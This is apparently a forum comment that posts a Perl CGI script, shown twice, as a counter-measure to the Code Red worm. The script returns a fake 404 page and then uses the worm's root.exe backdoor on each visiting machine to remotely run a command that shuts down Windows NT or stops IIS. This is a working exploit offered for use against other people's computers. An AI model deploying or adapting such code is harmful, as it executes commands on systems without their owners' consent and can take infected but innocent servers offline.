Comment Good alternative script (Score 1) 505
#!/usr/bin/perl -w
# Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL
# Change these variables to taste...
# 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
$full_shutdown = 1;
# 1 or 0 depending on whether you want to spoof a http 404 status code
$spoof_404 = 1;
# The location of a file that will be served up (if you're 404-ing this should
# look like a typical 404 message from your server for the file /default.ida)
$file = '/www/404.html';
use LWP::UserAgent;
use HTTP::Request;
# Make the HTTP header
if ($spoof_404) {
print "Status: 404 Not Found\n";
}
print "Content-type: text/html\n\n";
# Output the file to the browser
if (open FILE, $file) {
while (<FILE>) { print $_; }
close FILE;
}
# Makes it so the browser/virus isn't waiting for the outgoing request below
close STDOUT;
$server = $ENV{'REMOTE_ADDR'};
$rooturl = "http://$server/scripts/root.exe";
$connection = new LWP::UserAgent;
# Look like we're a real browser (ha!)
$connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");
if ($full_shutdown) {
# Attempt to shut down NT
$command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
}
else {
# Attempt to shut down IIS
$command = '/c+iisreset+/stop';
}
# Make the request
$response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");
# See if it worked, if so report to the web server's log file
if ($response->is_success) {
if ($full_shutdown) {
print STDERR "Code red NT shutdown on $server\n";
}
else {
print STDERR "Code red IIS shutdown on $server\n";
}
}
# Authored by Anthony Kilna (anthony@kilna.com) Licensed under GPL
# Change these variables to taste...
# 1 or 0 depending on whether you'd like to shut down NT entirely or just IIS
$full_shutdown = 1;
# 1 or 0 depending on whether you want to spoof a http 404 status code
$spoof_404 = 1;
# The location of a file that will be served up (if you're 404-ing this should
# look like a typical 404 message from your server for the file
$file = '/www/404.html';
use LWP::UserAgent;
use HTTP::Request;
# Make the HTTP header
if ($spoof_404) {
print "Status: 404 Not Found\n";
}
print "Content-type: text/html\n\n";
# Output the file to the browser
if (open FILE, $file) {
while (<FILE>) { print $_; }
close FILE;
}
# Makes it so the browser/virus isn't waiting for the outgoing request below
close STDOUT;
$server = $ENV{'REMOTE_ADDR'};
$rooturl = "http://$server/scripts/root.exe";
$connection = new LWP::UserAgent;
# Look like we're a real browser (ha!)
$connection->agent("Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)");
if ($full_shutdown) {
# Attempt to shut down NT
$command = '/c+rundll32.exe+shell32.dll,SHExitWindowsEx+5';
}
else {
# Attempt to shut down IIS
$command = '/c+iisreset+/stop';
}
# Make the request
$response = $connection->request(new HTTP::Request GET=>"$rooturl?$command");
# See if it worked, if so report to the web server's log file
if ($response->is_success) {
if ($full_shutdown) {
print STDERR "Code red NT shutdown on $server\n";
}
else {
print STDERR "Code red IIS shutdown on $server\n";
}
}
